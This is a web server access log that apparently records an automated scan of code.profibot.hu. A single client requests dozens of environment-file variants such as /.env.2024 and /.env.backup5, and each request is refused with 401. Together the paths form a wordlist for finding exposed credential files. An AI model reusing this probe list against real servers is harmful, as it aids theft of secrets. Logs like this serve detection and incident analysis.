[Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-01" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-03" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202503" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202504" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202501" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_2025" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202508" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-09" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-08" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202509" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202505" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202511" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202512" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup.2024" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024.bak" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/backup/.env.2024" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-01" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_2024" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202401" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-02" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202510" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202404" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-05" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202405" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202402" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-03" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202403" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-04" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-06" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-07" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-08" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202406" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202407" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202409" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202410" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202412" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-09" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202408" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2024-10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup1" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup2" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old1" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak1" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202411" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak3" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak2" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_2" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v1" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v2" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup3" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.3" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old3" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.4" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_3" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.5" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v3" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak5" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old4" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_4" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v4" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup4" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old5" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup5" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak4" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak6" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.6" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v6" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.7" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup6" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak7" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v5" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_5" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup7" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_8" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.9" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup8" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v8" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak9" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old6" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_6" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" 